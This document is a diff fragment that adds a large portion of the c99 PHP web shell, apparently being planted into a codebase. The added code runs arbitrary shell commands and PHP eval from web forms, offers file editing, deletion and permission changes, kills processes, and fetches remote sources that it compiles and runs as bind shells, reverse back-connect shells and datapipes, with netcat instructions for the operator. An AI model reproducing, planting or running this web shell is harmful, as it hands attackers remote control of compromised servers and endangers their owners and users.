+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b>^";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "tools")
+{
+ $bndportsrcs = array(
+  "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+  "c99sh_bindport.c"=>array("Using C","%path %port %pass")
+ );
+ $bcsrcs = array(
+  "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+  "c99sh_backconn.c"=>array("Using C","%path %host %port")
+ );
+ $dpsrcs = array(
+  "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+  "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+ );
+ if (!is_array($bind)) {$bind = array();}
+ if (!is_array($bc)) {$bc = array();}
+ if (!is_array($datapipe)) {$datapipe = array();}
+ 
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+  
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+ 
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+ if (!empty($bindsubmit))
+ {
+  echo "<b>Result of binding port:</b><br>";
+  $v = $bndportsrcs[$bind["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $w = explode(".",$bind["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ if (!empty($bcsubmit))
+ {
+  echo "<b>Result of back connection:</b><br>";
+  $v = $bcsrcs[$bc["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  else
+  {
+   $w = explode(".",$bc["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+   }
+  }
+ }
+ if (!empty($dpsubmit))
+ {
+  echo "<b>Result of datapipe-running:</b><br>";
+  $v = $dpsrcs[$datapipe["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $srcpath = $tmpdir.$datapipe["src"];
+   $w = explode(".",$datapipe["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
